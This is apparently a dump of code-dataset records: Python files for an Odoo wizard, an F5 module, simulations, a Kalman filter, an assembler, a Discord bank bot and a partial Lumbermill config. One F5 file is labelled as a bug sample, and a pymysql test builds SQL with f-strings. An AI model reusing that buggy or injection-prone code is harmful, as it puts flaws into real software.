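class NumpyArrayEncoder(json.JSONEncoder):
    def default(self, obj):
        if isinstance(obj, np.ndarray):
            return obj.tolist()
        if isinstance(obj, np.generic):
            return obj.item()
        return super().default(obj)

print(json.dumps({"lats_per_step": np.array([54.9, 55.1])}, cls=NumpyArrayEncoder))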
context=context)\n \n if 'active_ids' in context:\n band_first = True\n amount = 0.0\n my_checkbook = ''\n line_ids = []\n aux = []\n for voucher_id in self.pool.get('account.voucher').browse(cr, uid, context.get('active_ids'), context):\n if band_first:\n type = voucher_id.type\n res.update({'date': voucher_id.date })\n res.update({'partner_id': voucher_id.partner_id.id })\n if not type == 'payment':\n account_id = voucher_id.pay_mode_id.journal.default_credit_account_id.id\n else:\n account_id = voucher_id.pay_mode_id.journal.default_debit_account_id.id\n res.update({'account_id': account_id })\n res.update({'pay_mode_id': voucher_id.pay_mode_id.id })\n res.update({'type': voucher_id.type })\n res.update({'company_id': self.pool.get('res.users').browse(cr, uid, uid, context).company_id.id })\n res.update({'is_check': voucher_id.pay_mode_id.is_check })\n if voucher_id.pay_mode_id.is_check:\n # Obtengo la cuenta bancaria asociada al modo de pago\n mp_bank_id = voucher_id.pay_mode_id.bank_id.id\n list_checkb = self.pool.get('account.checkbook').search(cr, uid, [('account_bank_id', '=', mp_bank_id)])\n for check_b in list_checkb:\n my_checkbook = self.pool.get('account.checkbook').browse(cr, uid, check_b, context).actual_number\n res.update({'check_number': my_checkbook })\n band_first = False\n res.update({'number': voucher_id.number })\n res.update({'reference': voucher_id.reference })\n res.update({'journal_id': voucher_id.journal_id.id })\n res.update({'state': voucher_id.state })\n amount += voucher_id.amount\n res.update({'amount': voucher_id.amount })\n res.update({'date': voucher_id.date })\n # aux.append((0, 0, var_temp))\n if type == 'payment':\n for line in voucher_id.line_dr_ids:\n line_ids.append(line.id)\n if type == 'receipt':\n for line in voucher_id.line_cr_ids:\n line_ids.append(line.id)\n# res.update({'voucher_ids' : aux })\n res.update({'amount': amount })\n \n if type == 'payment':\n res.update({'line_dr_ids': line_ids })\n if type == 'receipt':\n res.update({'line_cr_ids': line_ids })\n return res\n\n# Aquí tengo que registrar el cheque\n# Aumentar la secuencia del cheque\n# Cambiar a estado \"Posted\" los Voucher seleccionados \n\n\n def save_transaction(self, cr, uid, ids, context):\n vals = {}\n for form in self.browse(cr, uid, ids): \n # Conformando los valores a salvar el pay_doc\n if form.check_number:\n vals['check_number'] = form.check_number\n vals['partner_id'] = form.partner_id.id\n vals['pay_mode_id'] = form.pay_mode_id.id\n vals['amount'] = form.amount\n vals['date'] = form.date\n vals['res_partner_id'] = form.res_partner_id.id\n vals['pay_reason'] = form.pay_reason\n vals['type'] = form.type\n vals['company_id'] = 1\n vals['state'] = 'open'\n\n # obj_pay_doc = self.pool.get('payment.document')\n # id = obj_pay_doc.create(cr, uid, vals, context=context)\n \n \n\n return {'type': 'ir.actions.act_window_close'}\n \n\n \naccount_payment_order_wizard()\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:","sub_path":"bit_payment/wizard/account_payment_order_wizard.py","file_name":"account_payment_order_wizard.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"481412203","text":"def update_on_device(self):\n params = self.changes.api_params()\n uri = 'https://{0}:{1}/mgmt/tm/gtm/server/{2}/virtual-servers/{3}'.format(self.client.provider['server'], self.client.provider['server_port'], transform_name(self.want.partition, self.want.server_name), 
self.want.name)\n resp = self.client.api.patch(uri, json=params)\n try:\n response = resp.json()\n except ValueError as ex:\n raise F5ModuleError(str(ex))\n if (('code' in response) and (response['code'] == 400)):\n if ('message' in response):\n raise F5ModuleError(response['message'])\n else:\n raise F5ModuleError(resp.content)","sub_path":"Data Set/bug-fixing-4/041da7516d72aa5d06c32fc6312a6e500624e540--bug.py","file_name":"041da7516d72aa5d06c32fc6312a6e500624e540--bug.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"49841333","text":"import numpy\nimport matplotlib.pyplot as plt\n\nVmax = 136. # km/hr\nL = 11. # km\nrhomax = 250. # cars/km\nnx = 51 #points\ndt = 0.001 #hr\ndelx = L/(nx-1)\nx = numpy.linspace(0, L, nx)\n\n#Initial condition \nrho0 = numpy.ones(nx)*20 \nrho0[10:20] = 50\nV = numpy.zeros(nx)\n\nrho = rho0.copy()\nfor i in range(nx):\n V[i] = Vmax * (1. - rho[i]/rhomax)\n\nprint(\"Maximum of rho0:\", numpy.max(rho0))\nprint(\"Minimum of V:\", numpy.min(V))\n\n# Solving equation for specified time\n# pay attention to parameter dimension\nTmax = 3./60.\nnomOfS = int(Tmax/dt)\n\nT = numpy.linspace(0, Tmax, nomOfS)\nrho = rho0.copy()\n\nfor j in range(nomOfS):\n rhon = rho.copy()\n for i in range(1, nx):\n rho[i] = rhon[i] - (dt/delx)*((rhon[i]*Vmax*(1.- (rhon[i]/rhomax))) - (rhon[i-1]*Vmax*(1.- (rhon[i-1]/rhomax))))\n # Remember Boundary condition\n rho[0] = 10.0\n\n# Calculating v based on computed density\nfor i in range(nx):\n V[i] = Vmax * (1. - rho[i]/rhomax)\n\nminvel = numpy.min(V)\n# minimum velocity (Pay attention to dimension)\nprint(\"minimum of velocity\", minvel * 1000. / 3600.)\n\n\nTotalflux = numpy.dot(rho,V) * delx\nTotalcars = numpy.sum(rho) * delx\nmeanvelocity = Totalflux/Totalcars\n# check dimension\nprint(\"Mean Velocity\", meanvelocity *1000. 
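# Sketch (assumption-labelled): update_on_device above follows a common
# "PATCH, parse JSON, surface API errors" shape. This standalone version uses
# plain requests rather than the F5 SDK; patch_resource and RuntimeError are
# illustrative stand-ins for the module's own names and F5ModuleError.
import requests

def patch_resource(url, params):
    resp = requests.patch(url, json=params)
    try:
        body = resp.json()
    except ValueError as ex:
        raise RuntimeError(str(ex))
    if 'code' in body and body['code'] == 400:
        raise RuntimeError(body.get('message', resp.content))
    return body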
/ 3600.)\n\nminInTime = numpy.min(V)\nprint (\"Minimum in specified time: \", minInTime * 1000./3600.)\n","sub_path":"traffic_flow.py","file_name":"traffic_flow.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"49302438","text":"from calcFunctions import constantFunction,functionMap\n\nnumPadList = [\n '7', '8', '9',\n '4', '5', '6',\n '1', '2', '3',\n '0', '.', '=',\n]\n\noperatorList = [\n '*', '/',\n '+', '-',\n '(', ')',\n 'C',\n]\n\n\nconstantList = [k[0] for k in constantFunction]\n\n\n\nfunctionList = [k[0] for k in functionMap]\n\n","sub_path":"keypad.py","file_name":"keypad.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"184366147","text":"#!/bin/python3\nimport sys\nimport numpy as np\nfilename = sys.argv[1] if len(sys.argv) > 1 else \"input\"\n\npart = (int(sys.argv[2]) if len(sys.argv) > 2 else None)\nwhile part is None:\n print(\"Part 1 or 2?\")\n reply = input(\"Choose: \")\n part = (int(reply) if reply == \"1\" or reply == \"2\" else None)\n\n# characters in problem statement\nFLOOR = \".\"\nEMPTY = \"L\"\nOCCUPIED = \"#\"\n\n# Show numpy grid\ndef show_grid(grid):\n for row in grid:\n print(\" \".join(map(str, row)))\n\n# Gets the adjacent surrounding seats of seat at r, c\ndef get_adjacent(seats, r, c):\n neighbors = np.zeros(seats.shape, dtype=bool)\n rows, cols = seats.shape\n adjacent = np.array([(r+i, c+j) for i in range(-1, 2) for j in range(-1, 2)\n if 0 <= r+i < rows and 0 <= c+j < cols and not (i == 0 and j == 0)])\n for nr, nc in adjacent:\n neighbors[nr, nc] = True\n return adjacent, neighbors\n\n# Gets visible seats from seat at r, c\ndef get_visible_chairs(seats, r, c):\n neighbors = np.zeros(seats.shape, dtype=bool)\n rows, cols = seats.shape\n valid = lambda row, col: (0 <= row < rows and 0 <= col < cols and not (row == r and col == c)\n and seats[row, col] != FLOOR)\n first = lambda x: np.array(x[0], dtype=int) if len(x) > 0 else np.array([-1, -1], dtype=int)\n W = np.array([(r, c-i) for i in range(cols) if valid(r, c-i)], dtype=int)\n E = np.array([(r, c+i) for i in range(cols) if valid(r, c+i)], dtype=int)\n N = np.array([(r-i, c) for i in range(cols) if valid(r-i, c)], dtype=int)\n S = np.array([(r+i, c) for i in range(cols) if valid(r+i, c)], dtype=int)\n NW = np.array([(r-i, c-i) for i in range(cols) if valid(r-i, c-i)], dtype=int)\n NE = np.array([(r-i, c+i) for i in range(cols) if valid(r-i, c+i)], dtype=int)\n SW = np.array([(r+i, c-i) for i in range(cols) if valid(r+i, c-i)], dtype=int)\n SE = np.array([(r+i, c+i) for i in range(cols) if valid(r+i, c+i)], dtype=int)\n visible = np.stack((first(W), first(E), first(N), first(S),\n first(NW), first(NE), first(SE), first(SW)))\n ok = np.all(visible >= 0, axis=1)\n for nr, nc in visible[ok]:\n neighbors[nr, nc] = True\n return visible[ok], neighbors\n\ndef initialize_neighbors(seats, positions):\n neighbors = {}\n for r, c in positions[seats != FLOOR]:\n neighbors[r, c] = (get_adjacent(seats, r, c) if part == 1 else get_visible_chairs(seats, r, c))\n return neighbors\n\n# Simulate one round of seating\ndef simulate_round(seats, positions, neighbors):\n limit = (4 if part == 1 else 5)\n simulation = seats.copy()\n flipped = np.where(seats == EMPTY, np.full(seats.shape, OCCUPIED), \n np.where(seats == OCCUPIED, np.full(seats.shape, EMPTY), np.full(seats.shape, FLOOR)))\n changed = np.zeros(seats.shape, 
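# Sketch (not in the original script): the nested time/space loop in
# traffic_flow.py above is a first-order upwind update of
# rho_t + F(rho)_x = 0 with F(rho) = rho*Vmax*(1 - rho/rhomax). The same
# update vectorised with numpy slicing; flux() is my helper name.
import numpy as np

Vmax, rhomax, L, nx, dt = 136., 250., 11., 51, 0.001
delx = L / (nx - 1)
rho = np.ones(nx) * 20.
rho[10:20] = 50.

def flux(r):
    return r * Vmax * (1. - r / rhomax)

for _ in range(int((3. / 60.) / dt)):
    rho[1:] = rho[1:] - (dt / delx) * (flux(rho[1:]) - flux(rho[:-1]))
    rho[0] = 10.0

print(np.min(Vmax * (1. - rho / rhomax)) * 1000. / 3600.)  # min velocity, m/s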
dtype=bool)\n occupied = np.zeros(seats.shape, dtype=int)\n if np.all(seats != OCCUPIED): # if no seats are occupied\n chairs = (seats == EMPTY)\n simulation[chairs] = OCCUPIED\n changed[chairs] = True\n else: # else check each position that might change\n for r, c in positions[seats != FLOOR]:\n _, isneighbor = neighbors[r, c]\n occupied[r, c] = np.sum((seats[isneighbor] == OCCUPIED))\n changed = (((seats == EMPTY) & (occupied == 0)) | ((seats == OCCUPIED) & (occupied >= limit)))\n simulation = np.where(changed, flipped, seats)\n return changed, simulation\n\ndef solve(filename):\n seats = []\n with open(filename) as file:\n for line in file:\n line = line.rstrip()\n seats.append([c for c in line])\n seats = np.array(seats)\n rows, cols = seats.shape\n positions = np.array([[(r, c) for c in range(cols)] for r in range(rows)])\n round = 0\n print(\"---Initial Layout---\")\n show_grid(seats)\n print(\"Building neighbor list...\")\n neighbors = initialize_neighbors(seats, positions)\n print(\"===Simulation Begin===\")\n while True:\n changed, simulation = simulate_round(seats, positions, neighbors) # simulate round\n if np.any(changed): # if any seat changed, continue, otherwise, finish\n round += 1\n print(f\"---Round {round}---\")\n seats = simulation\n show_grid(seats)\n else:\n break\n print(f\"===Simulation Ended after {round} rounds===\")\n print(f\"Part {part} # occupied: {np.sum(seats == OCCUPIED)}\")\n \nif __name__ == '__main__':\n print(f\"Input file: {filename}\")\n import time\n start = time.time()\n solve(filename)\n end = time.time()\n print(f\"Solve time: {end-start} seconds\")","sub_path":"Day11/Day11.py","file_name":"Day11.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"117498816","text":"import numpy as np\n\nimport pygame\nfrom pygame.locals import *\n\nclass Kalman:\n \"\"\"Implements Discrete-time Kalman filtering in a stateful fashion\n \"\"\"\n\n def __init__(self, manager):\n self.x = 0.0\n self.y = 0.0\n self.vx = 0.0\n self.vy = 0.0\n self.sig = 0.1\n self.sig_r = 0.1\n self.sig_q = 1.0\n self.manager = manager\n\n # process noise\n self.Er = np.array([[0.01], [0.01], [0.01], [0.01]])\n\n # measurement noise\n self.Eq = np.array([[0.01], [0.01], [0.01], [0.01]])\n\n # initialize belief state and covariance\n self.Mu = np.array([[self.x], [self.y], [self.vx], [self.vy]])\n self.var_S = np.array([10**-4, 10**-4, 10**-4, 10**-4])\n self.S = np.diag(self.var_S.flatten())\n\n # noiseless connection between state vector and measurement vector\n self.C = np.identity(4)\n\n # covariance of process noise model\n self.var_R = np.array([10**-6, 10**-6, 10**-5, 10**-5])\n self.R = np.diag(self.var_R.flatten())\n\n # covariance of measurement noise model\n self.var_Q = np.array([0.0156 * 10**-3, 0.0155 * 10**-3, 7.3811 * 10**-3, 6.5040 * 10**-3])\n self.Q = np.diag(self.var_Q.flatten())\n\n self.ready = False\n\n def done_waiting(self):\n \"\"\"Indicates filter readiness\n\n Returns:\n bool: Ready or not\n \"\"\"\n return self.ready\n\n def init_filter(self, pos, vel):\n \"\"\"Initializes filter. 
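# Sketch (scipy is an extra dependency the original Day11.py does not use):
# for part 1, the per-seat adjacency bookkeeping can be replaced by one 2-D
# convolution that counts occupied neighbours for every cell at once.
import numpy as np
from scipy.signal import convolve2d

occupied = np.array([[1, 0, 1],
                     [0, 0, 0],
                     [1, 0, 1]])
kernel = np.ones((3, 3), dtype=int)
kernel[1, 1] = 0  # a seat is not its own neighbour
print(convolve2d(occupied, kernel, mode='same'))  # centre cell counts 4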
Meant to be run only at first.\n\n Args:\n pos (pygame.Vector2): Car position measurement\n vel (pygame.Vector2): Car velocity measurement\n \"\"\"\n self.x = pos[0]\n self.y = pos[1]\n self.vx = vel[0]\n self.vy = vel[1]\n self.X = np.array([[self.x], [self.y], [self.vx], [self.vy]])\n self.Mu = self.X\n self.ready = True\n\n def add(self, pos, vel):\n \"\"\"Add a measurement.\n\n Args:\n pos (pygame.Vector2): Car position measurement\n vel (pygame.Vector2): Car velocity measurement\n \"\"\"\n # pos and vel are the measured values. (remember x_bar)\n self.x = pos[0]\n self.y = pos[1]\n self.vx = vel[0]\n self.vy = vel[1]\n self.X = np.array([[self.x], [self.y], [self.vx], [self.vy]])\n\n self.predict()\n self.correct()\n\n def predict(self):\n \"\"\"Implement discrete-time Kalman filter prediction/forecast step\n \"\"\"\n # collect params\n dt = self.manager.get_sim_dt()\n dt2 = dt**2\n # motion model\n A = np.array([[1, 0, dt, 0], [0, 1, 0, dt], [0, 0, 1, 0], [0, 0, 0, 1]])\n\n # control model\n B = np.array([[0.5 * dt2, 0], [0, 0.5 * dt2], [dt, 0], [0, dt]])\n # B = np.array([[0, 0], [0, 0], [dt, 0], [0, dt]])\n\n # process noise covariance\n R = self.R\n\n command = self.manager.simulator.camera.acceleration\n U = np.array([[command[0]], [command[1]]])\n\n # predict\n self.Mu = np.matmul(A, self.Mu) + np.matmul(B, U)\n self.S = np.matmul(np.matmul(A, self.S), np.transpose(A)) + R\n\n def correct(self):\n \"\"\"Implement discrete-time Kalman filter correction/update step\n \"\"\"\n Z = self.X\n K = np.matmul(\n np.matmul(\n self.S, self.C), np.linalg.pinv(\n np.matmul(\n np.matmul(\n self.C, self.S), np.transpose(\n self.C)) + self.Q))\n\n self.Mu = self.Mu + np.matmul(K, (Z - np.matmul(self.C, self.Mu)))\n self.S = np.matmul((np.identity(4) - np.matmul(K, self.C)), self.S)\n\n def add_pos(self, pos):\n \"\"\"Add position measurement\n\n Args:\n pos (pygame.Vector2): Car position measurement\n \"\"\"\n self.add(pos, (self.vx, self.vy))\n\n def add_vel(self, vel):\n \"\"\"Add velocity measurement\n\n Args:\n vel (pygame.Vector2): Car velocity measurement\n \"\"\"\n self.add((self.x, self.y), vel)\n\n def get_pos(self):\n \"\"\"Get estimated car position\n\n Returns:\n pygame.Vector2: Car estimated position\n \"\"\"\n return pygame.Vector2(self.Mu.flatten()[0], self.Mu.flatten()[1])\n\n def get_vel(self):\n \"\"\"Get estimated car velocity\n\n Returns:\n pygame.Vector2: Car estimated velocity\n \"\"\"\n return pygame.Vector2(self.Mu.flatten()[2], self.Mu.flatten()[3])\n","sub_path":"vbot/experiments/exp_lc/kf.py","file_name":"kf.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"574590904","text":"reg_8 = (\"ah\", \"al\", \"bh\", \"bl\", \"ch\", \"cl\", \"dh\", \"dl\")\nreg_16 = (\"ax\", \"bx\", \"cx\", \"dx\", \"si\", \"di\", \"bp\", \"sp\",)\nMOT = (\"add\",\"sub\",\"mov\",\"lea\",\"lds\",\"xchg\")\nDT = (\"db\",\"dw\",\"dd\")\nloc = 0\noffset = 0\nend_flag = 0\nflag = 1\nclass sym_table() :\n def __init__(self,var, offset, segment, var_type) :\n self.var = var\n self.offset = offset\n self.segment = segment\n self.var_type = var_type\n def __contains__(self,var) :\n return hasattr(self,var)\n def __contains__(self,var_type) :\n return hasattr(self,var_type)\n\nsym = []\n\n\ndef search_sym_table(var, var_type, n) : #function to check whether the symbol exists\n global loc\n global offset\n global end_flag\n offset = loc\n if \" \" in var :\n var = var.replace(\" \", \"!\")\n error(var,3) 
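# Sketch (toy tuning, not the tracker's real matrices): predict()/correct()
# above are the standard discrete-time Kalman cycle. The same algebra in
# compact form for a 1-D constant-velocity model:
import numpy as np

dt = 0.1
A = np.array([[1., dt], [0., 1.]])  # motion model
C = np.eye(2)                       # measurement model
R = np.diag([1e-6, 1e-5])           # process noise covariance
Q = np.diag([1e-3, 1e-3])           # measurement noise covariance

mu, S = np.zeros((2, 1)), np.eye(2) * 1e-4
z = np.array([[1.0], [0.5]])        # one (position, velocity) measurement

mu, S = A @ mu, A @ S @ A.T + R                         # predict
K = S @ C.T @ np.linalg.pinv(C @ S @ C.T + Q)           # Kalman gain
mu, S = mu + K @ (z - C @ mu), (np.eye(2) - K @ C) @ S  # correct
print(mu.ravel())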
\n if var not in sym :\n if var_type == \"segment\" : #checking for segment in symbol table\n for x in sym :\n if (var_type in x) & (end_flag > 0) :\n loc = 0\n else :\n error(\"\",2) \n offset = loc\n loc = offset\n end_flag+=1\n segment = \"\\titself\"\n elif var_type == \"db\" :\n var_type = \"Byte\"\n offset = loc\n loc = offset + 8*n\n segment = \"\\tdata\"\n elif var_type == \"dw\" :\n var_type = \"Word\"\n offset = loc\n loc = offset + 16*n\n segment = \"\\tdata\"\n elif var_type == \"dd\" :\n var_type = \"Doubleword\"\n offset = loc\n loc = offset +32*n\n segment = \"\\tdata\"\n else :\n offset = loc\n loc = offset\n segment = \"\\tcode\"\n else :\n error(var,0)\n sym.append(sym_table(var.lstrip(), offset, segment, var_type))\n\ndef print_sym_table() : #to print symbol table\n print(\"\\t\",'='*72)\n print(\" | Symbol\\t| Offset | Segment \\t| Type\\t\\t|\")\n print(\"\\t\",'='*72)\n for i in sym :\n print(\"\\t| \",i.var,\"\\t| \", i.offset,\"H\\t |\", i.segment,\"\\t\\t| \", i.var_type,\"\\t\\t|\")\n print(\"\\t\",'='*72)\n # f = open(\"out.txt\",\"w\")\n # f.write()\n\ndef check_start() :\n if \"start\" in sym:\n return True\n else :\n return False\n\ndef error(x, y) :\n if y == 0:\n print(x, \"already declared\")\n elif y == 1 : #error for missing START\n print(\"START label not defined\")\n elif y == 2 :\n print(\"segment declared before ending previous segment\")\n elif y == 3 :\n print(x, \"syntax error in variable name\")\n\ndef calc_inst_size(instruction) :\n print(instruction)\n\ndef assemble(x) :\n global flag\n x=x.lower()\n n = 0\n if \";\" in x : #to check for comments in a line\n pos = x.find(\";\")\n if len(x[0:pos]) != 0 :\n x = x[0:pos]\n assemble(x)\n elif \"segment\" in x : #to check for segment in a line\n pos = x.find(\"segment\")\n var = x[0:pos].strip()\n search_sym_table(var, \"segment\", n)\n elif (\":\" in x) & ((\"assume\" not in x) or (\"cs:\" not in x) or (\"ds:\" not in x)) : #to check for label\n pos = x.find(\":\")\n var = x[0:pos]\n search_sym_table(var, \"label\", n)\n else :\n if flag == 1:\n for dt in DT : #loop to check for data directive\n dt=\" \"+dt\n if (dt in x) :\n pos = x.find(dt)\n var = x[0:pos].strip()\n var1 = x[pos+2:len(x)]\n n = var1.count(',') + 1\n search_sym_table(var, dt.lstrip(), n)\n # flag = 1\n # else :\n # flag = 0\n # else :\n # for mt in MOT :\n # if mt in x :\n # if check_start() :\n # calc_inst_size()\n # else :\n # error(\"\", 1)\n # flag = 1\n\n\n\ndef sourceline() : #to read source file line by line from an external file\n File = open(\"program.txt\",\"r\")\n f = File.readlines()\n for x in f :\n assemble(x) \n\ndef main() :\n '''Objective:\n '''\n #Approach\n sourceline()\n print_sym_table()\n\nif __name__ == \"__main__\" :\n main()","sub_path":"pmain.py","file_name":"pmain.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"206999956","text":"import asyncio\nimport datetime\nimport discord\nimport os\nimport schedule\nimport sqlite3\nimport time\n\nimport economy_functions as ef\n\nfrom dotenv import load_dotenv\n\nDEPOSIT_RATE = 0.01\nLENDING_RATE = 0.02\n\n\ndef bank_balance(user):\n db = sqlite3.connect('main.sqlite')\n cursor = db.cursor()\n cursor.execute('SELECT dollars FROM bank_deposits WHERE user_id = ?',\n (user.id,))\n result = cursor.fetchone()\n if result is None:\n sql = ('INSERT INTO bank_deposits (user_id, dollars) VALUES(?, ?)')\n val = (user.id, 0)\n cursor.execute(sql, val)\n db.commit()\n ans = 
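# Sketch (WIDTH and advance are my names, not the assembler's): the offset
# arithmetic in search_sym_table above advances the location counter by
# 8/16/32 units per element for db/dw/dd respectively.
WIDTH = {'db': 8, 'dw': 16, 'dd': 32}

def advance(loc, directive, n_items):
    return loc + WIDTH[directive] * n_items

print(advance(0, 'dw', 3))  # 48, matching loc = offset + 16*n for three words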
0\n else:\n ans = round(result[0], 2)\n cursor.close()\n db.close()\n return f'{user.name} has {ans:.2f} dollars in deposits.'\n\n\ndef new_deposit(user, amount, guild_id):\n if (amount <= 0):\n return \"Please enter a positive amount.\"\n elif (ef.check_balance(user.id) < amount):\n return \"You do not have enough money on you.\"\n else:\n db = sqlite3.connect('main.sqlite')\n cursor = db.cursor()\n cursor.execute('SELECT dollars FROM bank_deposits WHERE user_id = ?',\n (user.id,))\n result = cursor.fetchone()\n if result is None:\n sql = ('INSERT INTO bank_deposits (user_id, dollars) VALUES(?, ?)')\n val = (user.id, amount)\n else:\n current_balance = result[0]\n sql = ('UPDATE bank_deposits SET dollars = ? WHERE user_id = ?')\n val = (current_balance + amount, user.id)\n cursor.execute(sql, val)\n db.commit()\n cursor.close()\n db.close()\n ef.ledger_update(\"Bank_Deposit\", guild_id, user.id, \"\\\"Bank\\\"\", amount)\n ef.money_transfer(\"\\\"Bank\\\"\", amount)\n ef.money_transfer(user.id, -amount)\n return f\"{user.name} deposited {amount:.2f} dollars.\"\n\n\ndef new_withdrawal(user, amount, guild_id):\n if (amount <= 0):\n return \"Please enter a positive amount.\"\n else:\n db = sqlite3.connect('main.sqlite')\n cursor = db.cursor()\n cursor.execute('SELECT dollars FROM bank_deposits WHERE user_id = ?',\n (user.id,))\n result = cursor.fetchone()\n if (result is None or result[0] < amount):\n cursor.close()\n db.close()\n return \"You do not have enough money in your account.\"\n else:\n current_balance = result[0]\n sql = ('UPDATE bank_deposits SET dollars = ? WHERE user_id = ?')\n val = (current_balance - amount, user.id)\n cursor.execute(sql, val)\n db.commit()\n cursor.close()\n db.close()\n ef.ledger_update(\"Bank_Withdrawal\", guild_id,\n \"\\\"Bank\\\"\", user.id, amount)\n ef.money_transfer(user.id, amount)\n ef.money_transfer(\"\\\"Bank\\\"\", -amount)\n return f\"{user.name} has withdrawn {amount:.2f} dollars.\"\n\n\ndef handle_interest():\n with open(\"date.txt\", \"r\") as f:\n current_day = datetime.datetime.strptime(f.readline(),\n '%m/%d/%Y').date()\n if (datetime.date.today() != current_day):\n d = (datetime.date.today() - current_day).days\n print(f\"Paying interest for {d} days\")\n db = sqlite3.connect('main.sqlite')\n cursor = db.cursor()\n cursor.execute(f'UPDATE bank_deposits SET dollars = ' \\\n f'dollars * {(1 + DEPOSIT_RATE / 365) ** d}')\n db.commit()\n with open(\"date.txt\", \"w+\") as f:\n f.write(datetime.date.today().strftime('%m/%d/%Y'))\n","sub_path":"bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"555074917","text":"\"\"\"\nA subarray A[i], A[i+1], ..., A[j] of A is called a turbulent subarray when it satisfies the following conditions:\n\nFor i <= k < j: A[k] > A[k+1] when k is odd, and A[k] < A[k+1] when k is even;\nor, for i <= k < j: A[k] > A[k+1] when k is even, and A[k] < A[k+1] when k is odd.\nIn other words, the subarray is turbulent if the comparison sign flips between each pair of adjacent elements in the subarray.\n\nReturn the length of the largest turbulent subarray of A.\n\nExample 1:\n\nInput: [9,4,2,10,7,8,8,1,9]\nOutput: 5\nExplanation: (A[1] > A[2] < A[3] > A[4] < A[5])\nExample 2:\n\nInput: [4,8,12,16]\nOutput: 2\nExample 3:\n\nInput: [100]\nOutput: 1\n\nConstraints:\n\n1 <= A.length <= 40000\n0 <= A[i] <= 10^9\nAccepted: 13,781  Submissions: 32,291\n\nSource: LeetCode (leetcode-cn)\nLink: https://leetcode-cn.com/problems/longest-turbulent-subarray\nCopyright belongs to LeetCode. Please contact official authorization for commercial reprints; please credit the source for non-commercial reprints.\n\"\"\"\nfrom typing import *\n\nclass Solution:\n def maxTurbulenceSize(self, arr: List[int]) -> int:\n largeOdd, largeEven, maxLen = 1, 1, 1\n for i in range(1, len(arr)):\n isOdd = (i % 2) == 1\n if arr[i] > arr[i - 1]:\n if 
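# Sketch (accrue is my helper, not part of bank.py): handle_interest above
# compounds deposits daily via dollars * (1 + DEPOSIT_RATE/365) ** d. A quick
# standalone check of that formula:
DEPOSIT_RATE = 0.01

def accrue(balance, days, rate=DEPOSIT_RATE):
    return balance * (1 + rate / 365) ** days

print(accrue(100.0, 365))  # ~101.005: 1% nominal APR -> ~1.005% effective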
isOdd:\n largeOdd += 1\n largeEven = 1\n else:\n largeOdd = 1\n largeEven += 1\n elif arr[i] < arr[i - 1]:\n if isOdd:\n largeOdd = 1\n largeEven += 1\n else:\n largeOdd += 1\n largeEven = 1\n else:\n largeOdd, largeEven = 1, 1\n\n maxLen = max(max(largeOdd, largeEven), maxLen)\n return maxLen","sub_path":"978_maxTurbulenceSizeSubArray.py","file_name":"978_maxTurbulenceSizeSubArray.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"361759375","text":"import pymysql as sql\ndata1=sql.connect(\"localhost\",\"root\",\"\",\"valkyrie\")\ncur=data1.cursor()\nclass test:\n\tdef inser(self):\n\t\tnum=\"55\"\n\t\tname=\"rr\"\n\t\tcur.execute(f\"insert into test values({num},'{name}')\")\n\t\tdata1.commit()\ntt=test()\ntt.inser()","sub_path":"database/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"350213564","text":"from celery.schedules import crontab\nfrom datetime import timedelta\n\n### lumbermill CONFIGURATION ###\n\n# Application general settings\nSERVER_NAME = ''\nDEBUG = True\nSECRET_KEY = ''\nDEVEL_MODE = True\nCACHE_TYPE = 'simple'\n\n# JWT Config\nJWT_AUTH_URL_RULE = '/api/auth'\nJWT_EXPIRATION_DELTA = timedelta(hours=24)\n\n# Redis\nLS_REDIS_URL = \"localhost\"\n\nCORS_HEADERS = 'Origin, Content-Type, Accept, Authorization'\nCORS_RESOURCES = {\n r\"/api/*\": {\n \"origins\": \"*\"\n }\n}\n\nCORS_METHODS = ['GET', 'POST', 'DELETE', 'PUT', 'OPTIONS', 'HEAD']\n\n\n# lumbermill (MongoDB) database\nMONGODB_DB = 'lumbermill'\nMONGODB_HOST = 'localhost'\nMONGODB_PORT = 27017 \n\n# Celery / MQ\nCELERY_BROKER_URL = 'redis://127.0.0.1:6379'\nCELERY_BACKEND_URL = 'redis://127.0.0.1:6379'\nCELERY_ACCEPT_CONTENT = ['pickle', 'json', 'msgpack', 'yaml']\nCELERYD_CONCURRENCY = 4\n\n############################################################\n### Stack process management, configuration & deployment ###\n############################################################\n\n# Lumbermill app controller path (setuid wrapper)\nLM_APPCONTROL_PATH = \"/opt/lumbermill/lumbermill-app-controller\"\n\n# Valid services for process management\nVALID_COMPONENTS = ['logstash-server', 'logstash-indexer', 'redis', 'elasticsearch', 'kibana']\n\n# Logstash\nLS_MAIN_SERVICE_NAME = \"logstash-server\"\n\n\nLS_CONFIG_BANNER = \"\"\"\n\n###\n### DO NOT MODIFY THIS FILE DIRECTLY - YOUR CHANGES WILL BE OVERWRITTEN!\n###\n### Use the following URL to make Logstash configuration changes:\n### https://%s\n###\n\n\"\"\" % SERVER_NAME\n\n# Various Logstash paths\nLS_CONFIG_DIR_PATH = \"/opt/logstash/conf\"\nLS_CONFIG_FILE = \"logstash-server.conf\"\nLS_CONFIG_BACKUP_DIR = \"backups\"\n\n\nLS_BINARY_PATH = \"/opt/logstash/bin/logstash\"\nLS_CONFIGTEST_FLAG = 